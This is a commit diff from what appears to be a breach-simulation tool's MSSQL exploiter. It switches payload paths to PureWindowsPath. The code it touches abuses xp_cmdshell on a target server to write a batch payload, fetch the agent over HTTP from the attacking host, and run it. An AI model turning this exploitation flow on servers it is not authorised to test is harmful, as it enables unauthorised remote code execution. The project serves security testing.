Agent: Use PureWindowsPath in MSSQLExploiter
When using PurePath, Linux agents use the wrong path separator to build Windows paths. Windows corrects this, so there's no actual issue, but it's sloppy. Using PureWindowsPath objects creates the paths with the correct separators Before: xp_cmdshell "NUL>%temp%\tmp_monkey_dir/tmp_monkey.bat" After: xp_cmdshell "NUL>%temp%\tmp_monkey_dir\tmp_monkey.bat"
This commit is contained in:
Mike Salvatore
parent
ef63f2699b
commit
ea980c4594
|
|
@ -1,6 +1,5 @@
|
|||
import logging
|
||||
import os
|
||||
from pathlib import PurePath
|
||||
from pathlib import PureWindowsPath
|
||||
from time import sleep
|
||||
|
||||
import pymssql
|
||||
|
|
@ -31,7 +30,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
# Temporary file that saves commands for monkey's download and execution.
|
||||
TMP_FILE_NAME = "tmp_monkey.bat"
|
||||
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
|
||||
TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
|
||||
|
||||
MAX_XP_CMDSHELL_COMMAND_SIZE = 12800
|
||||
|
||||
|
|
@ -49,9 +48,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
super().__init__()
|
||||
self.cursor = None
|
||||
self.agent_http_path = None
|
||||
self.payload_file_path = os.path.join(
|
||||
MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
|
||||
)
|
||||
self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
|
||||
|
||||
def _exploit_host(self) -> ExploiterResultData:
|
||||
"""
|
||||
|
|
@ -109,7 +106,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
return self.exploit_result
|
||||
|
||||
def run_payload_file(self):
|
||||
file_running_command = MSSQLLimitedSizePayload(self.payload_file_path)
|
||||
file_running_command = MSSQLLimitedSizePayload(str(self.payload_file_path))
|
||||
return self.run_mssql_command(file_running_command)
|
||||
|
||||
def create_temp_dir(self):
|
||||
|
|
@ -133,7 +130,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
|
||||
self.run_mssql_commands(array_of_commands)
|
||||
|
||||
def run_monkey(self, monkey_path_on_victim: PurePath):
|
||||
def run_monkey(self, monkey_path_on_victim: PureWindowsPath):
|
||||
monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
|
||||
logger.debug(
|
||||
f"Launching the agent: {monkey_launch_command.prefix} -- "
|
||||
|
|
@ -148,7 +145,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
self.cursor.execute(cmd)
|
||||
sleep(MSSQLExploiter.QUERY_BUFFER)
|
||||
|
||||
def upload_monkey(self, monkey_path_on_victim: PurePath):
|
||||
def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
|
||||
monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
|
||||
self.run_payload_file()
|
||||
self.add_executed_cmd(monkey_download_command.command)
|
||||
|
|
@ -164,7 +161,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
self.run_mssql_command(tmp_dir_removal_command)
|
||||
|
||||
def start_monkey_server(self, monkey_path_on_victim: PurePath) -> LockedHTTPServer:
|
||||
def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
|
||||
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
|
||||
self.host, str(monkey_path_on_victim), self.agent_repository
|
||||
)
|
||||
|
|
@ -175,12 +172,12 @@ class MSSQLExploiter(HostExploiter):
|
|||
http_thread.stop()
|
||||
http_thread.join(LONG_REQUEST_TIMEOUT)
|
||||
|
||||
def write_download_command_to_payload(self, monkey_path_on_victim: PurePath):
|
||||
def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath):
|
||||
monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
|
||||
self.run_mssql_command(monkey_download_command)
|
||||
return monkey_download_command
|
||||
|
||||
def get_monkey_launch_command(self, monkey_path_on_victim: PurePath):
|
||||
def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
|
||||
# Form monkey's launch command
|
||||
monkey_args = build_monkey_commandline(
|
||||
self.host, self.current_depth - 1, monkey_path_on_victim
|
||||
|
|
@ -193,7 +190,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
suffix=suffix,
|
||||
)
|
||||
|
||||
def get_monkey_download_command(self, monkey_path_on_victim: PurePath):
|
||||
def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath):
|
||||
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
|
||||
http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
|
||||
)
|
||||
|
|
|
|||
Loading…
Reference in New Issue